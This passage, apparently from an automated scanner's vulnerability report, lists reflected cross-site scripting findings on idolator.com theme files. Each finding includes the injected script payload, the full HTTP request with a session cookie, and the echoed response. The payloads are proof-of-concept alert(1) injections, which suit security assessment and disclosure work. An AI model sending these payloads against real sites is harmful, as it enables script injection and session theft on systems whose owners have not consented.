Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:24:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:24:58 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35927
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico7a72a\"><script>alert(1)</script>34d850d9df7" />
...[SNIP]...

4.177. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/js/functions.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87cc2"><script>alert(1)</script>4b5bf8e6379 was submitted in the REST URL parameter 1. This input was echoed as 87cc2\"><script>alert(1)</script>4b5bf8e6379 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content87cc2"><script>alert(1)</script>4b5bf8e6379/themes/idolator_1.5/js/functions.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:04 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35948
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content87cc2\"><script>alert(1)</script>4b5bf8e6379/themes/idolator_1.5/js/functions.js?ver=2.8.6" />
...[SNIP]...

4.178. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/js/functions.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd001"><script>alert(1)</script>790a185dce9 was submitted in the REST URL parameter 2. This input was echoed as cd001\"><script>alert(1)</script>790a185dce9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themescd001"><script>alert(1)</script>790a185dce9/idolator_1.5/js/functions.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:17 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35948
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themescd001\"><script>alert(1)</script>790a185dce9/idolator_1.5/js/functions.js?ver=2.8.6" />
...[SNIP]...

4.179. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/js/functions.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a563"><script>alert(1)</script>e8e13ff01b6 was submitted in the REST URL parameter 3. This input was echoed as 4a563\"><script>alert(1)</script>e8e13ff01b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.54a563"><script>alert(1)</script>e8e13ff01b6/js/functions.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:30 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35948
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.54a563\"><script>alert(1)</script>e8e13ff01b6/js/functions.js?ver=2.8.6" />
...[SNIP]...

4.180. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/js/functions.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a9d1"><script>alert(1)</script>e9a0a87099c was submitted in the REST URL parameter 4. This input was echoed as 5a9d1\"><script>alert(1)</script>e9a0a87099c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.5/js5a9d1"><script>alert(1)</script>e9a0a87099c/functions.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:42 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35948
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.5/js5a9d1\"><script>alert(1)</script>e9a0a87099c/functions.js?ver=2.8.6" />
...[SNIP]...

4.181. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/js/functions.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc22f"><script>alert(1)</script>a33e723ac48 was submitted in the REST URL parameter 5. This input was echoed as cc22f\"><script>alert(1)</script>a33e723ac48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.5/js/functions.jscc22f"><script>alert(1)</script>a33e723ac48?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:53 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35948
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.5/js/functions.jscc22f\"><script>alert(1)</script>a33e723ac48?ver=2.8.6" />
...[SNIP]...

4.182. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 694ab"><script>alert(1)</script>45f4d73f01a was submitted in the REST URL parameter 1. This input was echoed as 694ab\"><script>alert(1)</script>45f4d73f01a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content694ab"><script>alert(1)</script>45f4d73f01a/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:03 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36029
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content694ab\"><script>alert(1)</script>45f4d73f01a/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js?ver=2.8.6" />
...[SNIP]...

4.183. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2088"><script>alert(1)</script>fc7c4f6b312 was submitted in the REST URL parameter 2. This input was echoed as f2088\"><script>alert(1)</script>fc7c4f6b312 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesf2088"><script>alert(1)</script>fc7c4f6b312/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:16 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36029
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themesf2088\"><script>alert(1)</script>fc7c4f6b312/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js?ver=2.8.6" />
...[SNIP]...

4.184. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d02"><script>alert(1)</script>407babe3484 was submitted in the REST URL parameter 3. This input was echoed as 91d02\"><script>alert(1)</script>407babe3484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.591d02"><script>alert(1)</script>407babe3484/plugins/login-with-ajax/login-with-ajax.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:29 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36029
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.591d02\"><script>alert(1)</script>407babe3484/plugins/login-with-ajax/login-with-ajax.js?ver=2.8.6" />
...[SNIP]...

4.185. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95f62"><script>alert(1)</script>a7b59db39fc was submitted in the REST URL parameter 4. This input was echoed as 95f62\"><script>alert(1)</script>a7b59db39fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.5/plugins95f62"><script>alert(1)</script>a7b59db39fc/login-with-ajax/login-with-ajax.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:40 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36029
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.5/plugins95f62\"><script>alert(1)</script>a7b59db39fc/login-with-ajax/login-with-ajax.js?ver=2.8.6" />
...[SNIP]...

4.186. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c974"><script>alert(1)</script>5f09b725b77 was submitted in the REST URL parameter 5. This input was echoed as 5c974\"><script>alert(1)</script>5f09b725b77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.5/plugins/login-with-ajax5c974"><script>alert(1)</script>5f09b725b77/login-with-ajax.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:51 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36029
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax5c974\"><script>alert(1)</script>5f09b725b77/login-with-ajax.js?ver=2.8.6" />
...[SNIP]...

4.187. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490fb"><script>alert(1)</script>1aecddcc637 was submitted in the REST URL parameter 6. This input was echoed as 490fb\"><script>alert(1)</script>1aecddcc637 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js490fb"><script>alert(1)</script>1aecddcc637?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:34:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:34:04 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36029
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js490fb\"><script>alert(1)</script>1aecddcc637?ver=2.8.6" />
...[SNIP]...

4.188. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a82e"><script>alert(1)</script>708e7af903e was submitted in the REST URL parameter 1. This input was echoed as 8a82e\"><script>alert(1)</script>708e7af903e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content8a82e"><script>alert(1)</script>708e7af903e/themes/idolator_1.5/plugins/login-with-ajax/widget.css?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:04 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content8a82e\"><script>alert(1)</script>708e7af903e/themes/idolator_1.5/plugins/login-with-ajax/widget.css?ver=2.8.6" />
...[SNIP]...

4.189. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css

Issue detail

